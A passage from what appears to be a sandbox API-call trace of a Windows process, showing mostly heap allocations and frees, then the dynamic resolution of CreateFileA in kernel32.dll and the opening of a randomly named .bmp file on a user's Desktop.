returned 0x9bd870 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0161.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0161.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.762] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.766] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd600 [0161.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd600, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0161.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.767] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0161.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0161.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0161.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.767] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0161.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0161.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa85008 [0161.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0161.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x35) returned 0x90ad98 [0161.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", cchWideChar=53, lpMultiByteStr=0x90ad98, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", lpUsedDefaultChar=0x0) returned 53 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.769] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyejktglaf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa85008, cbMultiByte=53, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a) returned 0x906f38 [0161.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa85008, cbMultiByte=53, lpWideCharStr=0x906f38, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp") returned 53 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa85008 | out: hHeap=0x8a0000) returned 1 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.773] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) 